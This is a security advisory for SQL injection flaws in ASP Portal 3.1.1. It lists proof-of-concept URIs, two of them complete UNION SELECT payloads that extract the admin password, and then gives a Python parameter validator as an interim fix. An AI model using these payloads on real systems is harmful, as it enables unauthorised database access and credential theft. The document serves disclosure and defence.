ASP Portal Multiple SQL Injection Vulnerabilities
BID:17174
Info
| Bugtraq ID: | 17174 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2006 12:00AM |
| Updated: | Mar 21 2006 11:04PM |
| Credit: | nukedx is credited with the discovery of these vulnerabilities. |
| Vulnerable: | ASP Portal ASP Portal 3.1.1 |
| Not Vulnerable: | |
Discussion
ASP Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Some of these issues may require administrative privileges to exploit.
Exploit / POC
This issue can be exploited via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='admin'
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
http://www.example.com/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
http://www.example.com/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
http://www.example.com/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
http://www.example.com/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
http://www.example.com/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
http://www.example.com/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=1
An exploit is available for the download_click.asp issue:
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
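Since no vendor patch is listed, one interim control is to validate the parameters named in the proof-of-concept URIs before requests reach the application. The following Python check is an added example, not part of the advisory or of ASP Portal; it assumes the ID parameters are non-negative integers and that sortby is a plain column name, neither of which the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: [SQLCode] parameters are integer IDs; sortby is a column name.
INT = re.compile(r"[0-9]{1,10}")
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
# Path suffix -> {parameter: pattern}; lower-cased, as IIS/ASP ignore case.
RULES = {
    "/content/downloads/download_click.asp": {"downloadid": INT},
    "/content/news/news_item.asp": {"content_id": INT},
    "/content/users/add_edit_user.asp": {"user_id": INT},
    "/content/banner_adds/banner_add_edit.asp": {"bannerid": INT},
    "/content/categories/add_edit_cat.asp": {"cat_id": INT},
    "/content/news/add_edit_news.asp": {"content_id": INT},
    "/content/downloads/add_edit_download.asp": {"download_id": INT},
    "/content/poll/add_edit_poll.asp": {"poll_id": INT},
    "/content/contactus/contactus_add_edit.asp": {"contactid": INT},
    "/content/poll/poll_list.asp": {"sortby": IDENT},
}

def violations(url):
    """Return [(param, value)] for listed parameters that fail validation."""
    parts = urlsplit(url)
    path = parts.path.lower()
    rules = next((r for sfx, r in RULES.items() if path.endswith(sfx)), {})
    bad, seen = [], set()
    # parse_qsl decodes %XX and '+'; blank values are kept so empty IDs fail.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        key = name.lower()
        pattern = rules.get(key)
        if pattern is None:
            continue
        # Classic ASP joins repeated parameters with ", ", so a repeat is
        # rejected even when each copy looks valid on its own.
        if key in seen or not pattern.fullmatch(value):
            bad.append((name, value))
        seen.add(key)
    return bad

# Constructed sample requests against the advisory's example.com paths.
SAMPLES = [
    "http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=42",
    "http://www.example.com/apdir/content/news/News_Item.asp?content_ID=7%20OR%201=1",
    "http://www.example.com/apdir/content/poll/poll_list.asp?sortby=poll_date,1&page_no=1",
    "http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=5&user_id=6",
]
if __name__ == "__main__":
    for url in SAMPLES:
        print("REJECT" if violations(url) else "ok    ", url)
```

The same rules can run in a reverse-proxy filter or over stored access logs to find past requests that would have been rejected.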